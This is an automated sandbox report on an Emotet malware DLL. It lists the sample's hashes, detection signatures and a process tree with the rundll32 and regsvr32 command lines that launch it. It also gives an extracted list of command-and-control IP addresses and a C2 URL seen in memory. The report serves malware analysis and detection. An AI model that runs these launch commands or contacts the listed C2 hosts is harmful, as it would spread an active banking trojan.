Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gdazhx1EIP.exe

Overview

General Information

Sample Name:gdazhx1EIP.exe (renamed file extension from exe to dll)
Analysis ID:745034
MD5:6b304d058ae0788762f8924d2cad7ef5
SHA1:f416b3c02d4f1746f8a642af253ee0d903b7b083
SHA256:5b2039d5a1ba30d90ecd085eb135635f9830f4ae88472e779267e033f7eb4547
Tags:dllexe
Infos:

Detection

Emotet
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Registers a DLL
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 5948 cmdline: loaddll64.exe "C:\Users\user\Desktop\gdazhx1EIP.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5048 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 2436 cmdline: rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • regsvr32.exe (PID: 5244 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RSNLKxhQH\IhDzTlHldHNg.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 676 cmdline: regsvr32.exe /s C:\Users\user\Desktop\gdazhx1EIP.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 5204 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VGdnyYmEzk\YPrp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 4252 cmdline: rundll32.exe C:\Users\user\Desktop\gdazhx1EIP.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • regsvr32.exe (PID: 4896 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XeFlcoVt\wPzeOKW.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5444 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MtAvdtxCDyblyei\mPrhkfVupthqSBxp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 2356 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\RSNLKxhQH\IhDzTlHldHNg.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 3092 cmdline: C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\EHrtIMNuOOnxGF\cDTWQXzuCIj.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup
{"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"]}
SourceRuleDescriptionAuthorStrings
00000006.00000002.771127294.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000004.00000002.261854248.0000018104890000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000006.00000002.769097156.0000000000490000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000013.00000002.415103190.00000000028E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000013.00000002.415208554.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.18104890000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.regsvr32.exe.b60000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0.2.loaddll64.exe.1fd03f10000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  6.2.regsvr32.exe.490000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    19.2.regsvr32.exe.28e0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 7 entries
                      No Sigma rule has matched
                      Timestamp:192.168.2.3115.178.55.2249698802404304 11/13/22-18:01:59.432679
                      SID:2404304
                      Source Port:49698
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: gdazhx1EIP.dllVirustotal: Detection: 43%Perma Link
                      Source: 00000006.00000002.769331647.00000000004C8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"]}
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC28919410 CryptStringToBinaryA,CryptStringToBinaryA,0_2_00007FFC28919410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC28919410 CryptStringToBinaryA,CryptStringToBinaryA,3_2_00007FFC28919410
                      Source: gdazhx1EIP.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC2890C334 FindFirstFileExW,0_2_00007FFC2890C334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC2890C334 FindFirstFileExW,3_2_00007FFC2890C334

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 115.178.55.22 80Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.105.115.71 8080Jump to behavior
                      Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.3:49698 -> 115.178.55.22:80
                      Source: Malware configuration extractorIPs: 172.105.115.71:8080
                      Source: Malware configuration extractorIPs: 218.38.121.17:443
                      Source: Malware configuration extractorIPs: 186.250.48.5:443
                      Source: Malware configuration extractorIPs: 103.71.99.57:8080
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 85.25.120.45:8080
                      Source: Malware configuration extractorIPs: 139.196.72.155:8080
                      Source: Malware configuration extractorIPs: 103.85.95.4:8080
                      Source: Malware configuration extractorIPs: 198.199.70.22:8080
                      Source: Malware configuration extractorIPs: 209.239.112.82:8080
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 36.67.23.59:443
                      Source: Malware configuration extractorIPs: 104.244.79.94:443
                      Source: Malware configuration extractorIPs: 62.171.178.147:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 103.56.149.105:8080
                      Source: Malware configuration extractorIPs: 80.211.107.116:8080
                      Source: Malware configuration extractorIPs: 93.104.209.107:8080
                      Source: Malware configuration extractorIPs: 174.138.33.49:7080
                      Source: Malware configuration extractorIPs: 202.28.34.99:8080
                      Source: Malware configuration extractorIPs: 178.62.112.199:8080
                      Source: Malware configuration extractorIPs: 114.79.130.68:443
                      Source: Malware configuration extractorIPs: 118.98.72.86:443
                      Source: Malware configuration extractorIPs: 103.41.204.169:8080
                      Source: Malware configuration extractorIPs: 178.238.225.252:8080
                      Source: Malware configuration extractorIPs: 83.229.80.93:8080
                      Source: Malware configuration extractorIPs: 46.101.98.60:8080
                      Source: Malware configuration extractorIPs: 82.98.180.154:7080
                      Source: Malware configuration extractorIPs: 87.106.97.83:7080
                      Source: Malware configuration extractorIPs: 196.44.98.190:8080
                      Source: Malware configuration extractorIPs: 139.59.80.108:8080
                      Source: Malware configuration extractorIPs: 103.224.241.74:8080
                      Source: Malware configuration extractorIPs: 103.254.12.236:7080
                      Source: Malware configuration extractorIPs: 185.148.169.10:8080
                      Source: Malware configuration extractorIPs: 165.22.254.236:8080
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Malware configuration extractorIPs: 51.75.33.122:443
                      Source: Malware configuration extractorIPs: 128.199.217.206:443
                      Source: Malware configuration extractorIPs: 188.165.79.151:443
                      Source: Malware configuration extractorIPs: 210.57.209.142:8080
                      Source: Malware configuration extractorIPs: 160.16.143.191:8080
                      Source: Malware configuration extractorIPs: 175.126.176.79:8080
                      Source: Malware configuration extractorIPs: 202.134.4.210:7080
                      Source: Malware configuration extractorIPs: 103.126.216.86:443
                      Source: Malware configuration extractorIPs: 190.145.8.4:443
                      Source: Malware configuration extractorIPs: 128.199.242.164:8080
                      Source: Malware configuration extractorIPs: 64.227.55.231:8080
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewIP Address: 172.105.115.71 172.105.115.71
                      Source: Joe Sandbox ViewIP Address: 188.165.79.151 188.165.79.151
                      Source: unknownNetwork traffic detected: IP country count 20
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.105.115.71
                      Source: regsvr32.exe, 00000006.00000003.383008257.0000000000533000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.505110326.0000000000555000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.769976264.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000006.00000003.372708903.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: regsvr32.exe, 00000006.00000003.373536818.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.372708903.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/&
                      Source: regsvr32.exe, 00000006.00000003.383161072.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.374254189.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.373590335.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.382923666.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.770225970.0000000000595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Lown:
                      Source: regsvr32.exe, 00000006.00000003.383161072.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.374254189.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.373590335.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.382923666.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.770225970.0000000000595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/c:R
                      Source: regsvr32.exe, 00000006.00000003.505453836.000000000051A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.382745999.000000000051A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.504752110.000000000051A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.769713040.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: regsvr32.exe, 00000006.00000003.383161072.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.374254189.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.374244043.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.383220895.000000000058F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.373590335.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.373569053.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.382923666.0000000000595000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.770225970.0000000000595000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000006.00000003.373952902.0000000001FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9deba9f18b7fc
                      Source: regsvr32.exe, 00000006.00000003.505190302.000000000053B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.383008257.0000000000533000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.505078011.0000000000534000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://112.105.115.71:8080/
                      Source: regsvr32.exe, 00000006.00000003.505453836.000000000051A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.382745999.000000000051A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.504752110.000000000051A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.769713040.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://172.105.115.71:8080/
                      Source: regsvr32.exe, 00000006.00000003.383008257.0000000000533000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.505360051.0000000000534000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.505078011.0000000000534000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.769331647.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.769796168.0000000000534000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://172.105.115.71:8080/lsug/nhhwenwy/qahixm/

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 4.2.rundll32.exe.18104890000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.b60000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1fd03f10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.490000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.regsvr32.exe.28e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.222d2e50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.b60000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.222d2e50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1fd03f10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.18104890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.regsvr32.exe.28e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.490000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.771127294.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.261854248.0000018104890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.769097156.0000000000490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.415103190.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.415208554.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.260138697.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.261058866.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.261968375.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.268048394.000001FD03F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.262113824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.262654779.00000222D2E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\rundll32.exeFile deleted: C:\Windows\System32\RSNLKxhQH\IhDzTlHldHNg.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeFile created: C:\Windows\system32\MtAvdtxCDyblyei\Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC28913FB00_2_00007FFC28913FB0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC289119100_2_00007FFC28911910
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC2890C3340_2_00007FFC2890C334
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC2890A3700_2_00007FFC2890A370
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC2890ABC00_2_00007FFC2890ABC0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800204540_2_0000000180020454
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180028C940_2_0000000180028C94
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800038A50_2_00000001800038A5
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800248E00_2_00000001800248E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800091440_2_0000000180009144
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180005DB40_2_0000000180005DB4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180004DDC0_2_0000000180004DDC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000B1E00_2_000000018000B1E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180009E380_2_0000000180009E38
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180003BE80_2_0000000180003BE8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180009BEC0_2_0000000180009BEC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800173F80_2_00000001800173F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180017BF80_2_0000000180017BF8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800154000_2_0000000180015400
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800010000_2_0000000180001000
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000741C0_2_000000018000741C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000E8280_2_000000018000E828
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800028340_2_0000000180002834
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180014C480_2_0000000180014C48
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002005C0_2_000000018002005C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800164640_2_0000000180016464
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800054780_2_0000000180005478
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800068800_2_0000000180006880
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002748C0_2_000000018002748C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001308C0_2_000000018001308C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800240980_2_0000000180024098
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001B8980_2_000000018001B898
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000C4980_2_000000018000C498
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180004CA00_2_0000000180004CA0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800110AC0_2_00000001800110AC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800148B00_2_00000001800148B0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800078B60_2_00000001800078B6
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180001CCC0_2_0000000180001CCC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000B8D00_2_000000018000B8D0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800198DC0_2_00000001800198DC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800038DC0_2_00000001800038DC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800264F80_2_00000001800264F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800084F80_2_00000001800084F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000BD000_2_000000018000BD00
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800155080_2_0000000180015508
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180018D0C0_2_0000000180018D0C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800121100_2_0000000180012110
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001B5200_2_000000018001B520
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800291240_2_0000000180029124
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800135240_2_0000000180013524
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180009D240_2_0000000180009D24
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180023D280_2_0000000180023D28
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800021280_2_0000000180002128
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800209300_2_0000000180020930
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001F5500_2_000000018001F550
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180020D540_2_0000000180020D54
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800109540_2_0000000180010954
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800185600_2_0000000180018560
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000E5700_2_000000018000E570
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001C9740_2_000000018001C974
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000F1740_2_000000018000F174
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180025D840_2_0000000180025D84
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800055900_2_0000000180005590
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800171980_2_0000000180017198
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800159A00_2_00000001800159A0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180011DAC0_2_0000000180011DAC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000D1AC0_2_000000018000D1AC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800069C00_2_00000001800069C0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000A1D40_2_000000018000A1D4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800079D80_2_00000001800079D8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001C1DC0_2_000000018001C1DC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000D1E00_2_000000018000D1E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800199E80_2_00000001800199E8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800099EC0_2_00000001800099EC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180028A040_2_0000000180028A04
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001FA080_2_000000018001FA08
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E6140_2_000000018001E614
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180001A1C0_2_0000000180001A1C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000BA240_2_000000018000BA24
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180021A2C0_2_0000000180021A2C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800192300_2_0000000180019230
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000BE340_2_000000018000BE34
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800122440_2_0000000180012244
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800066500_2_0000000180006650
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800016600_2_0000000180001660
